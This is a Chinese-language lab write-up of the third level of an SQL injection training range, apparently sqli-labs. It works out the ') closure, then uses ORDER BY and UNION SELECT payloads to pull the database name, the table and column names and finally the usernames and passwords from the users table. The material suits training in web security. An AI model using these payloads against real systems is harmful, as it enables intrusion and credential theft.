less-3
打开靶场
输入id=1
判断注入类型
id=1'
报错了,存在sql注入,
id=1'--+
还是报错的,感觉是闭合符号不一样。
试试')
这里看了源代码
所以输入
id=1')--+
')来闭合前面的(',--+来注释掉后面的').
判断字段数
id = 1') order by 3 --+
回显正常,判断字段数4
id = 1') order by 4 --+
判断回显位
id= -1') union select 1,2,3 --+
得到了2,3的回显位。
爆破数据库名与数据库版本
id= -1') union select 1,database(),version() --+
得到了对应的数据库名称:security
爆破数据库的表名
id=-1 ') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
爆破users表的字段
id=-1 ') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
得到对应的字段名。
爆破users表中字段的数据
id=-1') union select 1,2,group_concat(username,id,password) from users --+
最后得到完整的数据。